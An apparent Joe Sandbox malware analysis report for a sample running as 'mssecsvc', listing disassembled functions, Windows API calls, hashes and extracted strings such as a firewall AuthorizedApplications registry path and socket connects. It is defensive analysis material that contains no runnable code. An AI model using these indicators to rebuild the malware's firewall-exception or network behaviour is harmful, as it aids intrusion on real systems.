                    • API String ID: 774561529-2942426231
                    • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                    • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 227 7fea4499-7fea44a1 228 7fea44c8-7fea4504 CreateFileA 227->228 229 7fea44a3-7fea44ad GetFileAttributesA 227->229 236 7fea4506-7fea451f 228->236 237 7fea4527-7fea454d 228->237 229->228 230 7fea44af-7fea44c0 SetFileAttributesA 229->230 230->228 232 7fea44c2 230->232 232->228 236->237 240 7fea4521 236->240 242 7fea4558-7fea4582 CreateFileMappingA 237->242 243 7fea454f-7fea4556 237->243 240->237 246 7fea458d-7fea45a2 MapViewOfFile 242->246 247 7fea4584-7fea458b 242->247 243->242 249 7fea45a8-7fea45ae 246->249 247->246
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                    • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                    • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                    • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                    • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$MappingView
                    • String ID:
                    • API String ID: 1961427682-0
                    • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                    • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                    • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                    • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 b005ba-b005bd 281 b005c9 280->281 282 b005bf-b005c7 Sleep 280->282 282->280
                    APIs
                    • Sleep.KERNELBASE(0000000A,00B0085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00B005C1
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                    • Instruction ID: 1b998fdb77a0b33727ba289b57c3e228ca6def8b45a68119d6a5a2c04fd7d553
                    • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                    • Instruction Fuzzy Hash: E0B0122825030099DA1429104CCEF041EA47F10B51FE000D9E2064C0C007E407001D0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 7FEA3CA1
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1749273276-504487454
                    • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                    • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 00B03CA1
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B03CD4
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1749273276-504487454
                    • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction ID: 30f6b726b2dc0a9ec4678c08a5921c73451881e265310739d5db59524fc70b09
                    • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction Fuzzy Hash: 0102E0B1518258BFEB21AF248C4EBEA7FECEF41700F004599E9499E0C2D7F05F4586A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2837544101-504487454
                    • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
                    • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(00B03CBA), ref: 00B03CC2
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B03CD4
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2837544101-504487454
                    • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction ID: 378d54b43414769907a859e61919a057c710afa5f578910c5255a9ff75fbbc65
                    • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                    • Instruction Fuzzy Hash: 4AE10FB1518258BFEB25AF248C4EBEA7FECEF41700F004599E9499E0C2D7F45F4586A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
                    • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 7FEA3D07
                      • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,7FEA3D12), ref: 7FEA3D20
                      • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 215653160-504487454
                    • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
                    • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(00B03CE5), ref: 00B03CF0
                    • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 00B03D07
                      • Part of subcall function 00B03D1F: lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00B03D12), ref: 00B03D20
                      • Part of subcall function 00B03D1F: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D1F: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 215653160-504487454
                    • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction ID: 1aecaced767be6aae0fa585a575e6189f678f80356d3b31df001922be16858ca
                    • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                    • Instruction Fuzzy Hash: 29E1DEB1518248BFEB25AF248C4EBEA7FECEF41700F004699E9499E0C2D7F45F4586A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,7FEA3D12), ref: 7FEA3D20
                      • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                      • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2038497427-504487454
                    • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
                    • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrcat.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00B03D12), ref: 00B03D20
                      • Part of subcall function 00B03D36: LoadLibraryA.KERNEL32(00B03D2B), ref: 00B03D36
                      • Part of subcall function 00B03D36: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D36: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2038497427-504487454
                    • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction ID: a933d1db4e2ffdd305746e8e437b22a3839cd693654d799fb68303d6e4dd10f7
                    • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                    • Instruction Fuzzy Hash: 90E1EDB1518248BEEB25AF248C4EBEA3FECEF41700F004699E9499E0C2D7F45F4586A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                      • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                      • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                      • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
                      • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    Strings
                    • ADVAPI32.DLL, xrefs: 7FEA3D5E
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 3734769084-504487454
                    • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
                    • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(00B03D2B), ref: 00B03D36
                      • Part of subcall function 00B03D4B: GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                      • Part of subcall function 00B03D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                      • Part of subcall function 00B03D4B: GetTickCount.KERNEL32 ref: 00B03D93
                      • Part of subcall function 00B03D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • ADVAPI32.DLL, xrefs: 00B03D5E
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 3734769084-504487454
                    • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction ID: 4383889754621d187e23d11e909353867082635ea86425ecb227d76a4b595811
                    • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                    • Instruction Fuzzy Hash: D9D1DCB1518249BEEB25AF248C4EBEA7FECEF41700F000699E9499E0C2D7F45F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    • wsprintfA.USER32 ref: 7FEA3EF7
                    • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA42D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA430A
                    Strings
                    • ADVAPI32.DLL, xrefs: 7FEA3D5E
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
